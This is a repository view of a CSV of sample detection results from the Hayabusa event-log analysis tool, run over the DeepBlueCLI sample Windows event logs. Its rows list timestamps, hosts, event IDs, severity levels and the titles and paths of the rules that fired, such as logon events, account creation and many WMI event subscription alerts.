CSEC_PUBLIC/hayabusa
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
e4cb853df0c7a668330828aa190800a25da97167
hayabusa/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
Tanaka Zakku 4a73a8c66c Sample results
2021-12-22 11:27:06 +09:00

4.6 MiB
Raw Blame History

1TimestampComputerEventIDLevelRuleTitleDetailsRulePathFilePath
22013-10-24 01:16:13.843 +09:0037L4247D28-054624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
32013-10-24 01:16:29.000 +09:0037L4247D28-054625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
42013-10-24 01:17:44.109 +09:0037L4247D28-051highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
52013-10-24 01:17:44.109 +09:0037L4247D28-051highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
62013-10-24 01:18:09.203 +09:0037L4247D28-052003lowUSB Device Pluggedrules/sigma/other/driverframeworks/win_usb_device_plugged.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
72013-10-24 01:18:33.828 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
82013-10-24 01:18:33.828 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
92013-10-24 01:18:50.500 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
102013-10-24 01:21:30.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
112013-10-24 01:21:33.630 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
122013-10-24 01:21:33.630 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
132013-10-24 01:21:33.630 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
142013-10-24 01:22:39.911 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
152013-10-24 01:22:39.911 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
162013-10-24 01:22:39.911 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
172013-10-24 01:22:39.973 +09:00IE8Win74720mediumLocal user account createdUser: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
182013-10-24 01:22:39.973 +09:00IE8Win74720mediumLocal user account createdUser: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
192013-10-24 01:22:40.004 +09:00IE8Win74732highUser added to local Administrators groupUser: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administratorsrules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
202013-10-24 01:22:40.004 +09:00IE8Win74732highUser added to local Administrators groupUser: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administratorsrules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
212013-10-24 01:22:40.005 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
222013-10-24 01:22:40.005 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
232013-10-24 01:22:44.979 +09:00IE8Win74648informationalExplicit LogonSource User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
242013-10-24 01:22:44.979 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
252013-10-24 01:22:44.979 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
262013-10-24 01:22:44.979 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x298c5rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
272013-10-24 01:23:39.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
282013-10-24 01:23:39.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
292013-10-24 01:24:00.130 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
302013-10-24 01:24:00.130 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
312013-10-24 01:24:00.161 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
322013-10-24 01:24:53.630 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
332013-10-24 01:27:48.911 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
342013-10-24 01:27:48.911 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
352013-10-24 01:28:54.348 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
362013-10-24 01:28:54.348 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
372013-10-24 01:32:51.504 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
382013-10-24 02:05:04.489 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
392013-10-24 02:27:21.754 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x29908rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
402013-10-24 02:27:37.645 +09:00IE8Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
412013-10-24 02:30:47.140 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
422013-10-24 02:30:47.140 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
432013-10-24 02:30:52.625 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
442013-10-24 02:30:58.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
452013-10-24 02:31:10.741 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
462013-10-24 02:31:10.741 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
472013-10-24 02:31:10.741 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
482013-10-24 02:32:53.796 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
492013-10-24 02:32:53.796 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
502013-10-24 02:33:10.078 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
512013-10-24 02:33:18.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
522013-10-24 02:33:31.593 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
532013-10-24 02:33:31.593 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
542013-10-24 02:33:31.593 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
552013-10-24 02:35:55.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
562013-10-24 02:35:55.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
572013-10-24 02:36:53.671 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
582013-10-24 02:36:53.671 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
592013-10-24 02:36:53.671 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
602013-10-24 02:36:53.671 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x57d5brules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
612013-10-24 02:38:42.499 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
622013-10-24 02:45:29.131 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
632013-10-24 02:45:29.131 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
642013-10-24 02:45:29.131 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
652013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
662013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
672013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
682013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
692013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
702013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
712013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
722013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
732013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
742013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
752013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
762013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
772013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
782013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
792013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
802013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
812013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
822013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
832013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
842013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
852013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
862013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
872013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
882013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
892013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
902013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
912013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
922013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
932013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
942013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
952013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
962013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
972013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
982013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
992013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1002013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1012013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1022013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1032013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1042013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1052013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1062013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1072013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1082013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1092013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1102013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1112013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1122013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1132013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1142013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1152013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1162013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1172013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1182013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1192013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1202013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1212013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1222013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1232013-10-24 02:45:31.256 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1242013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1252013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1262013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1272013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1282013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1292013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1302013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1312013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1322013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1332013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1342013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1352013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1362013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1372013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1382013-10-24 02:45:31.272 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
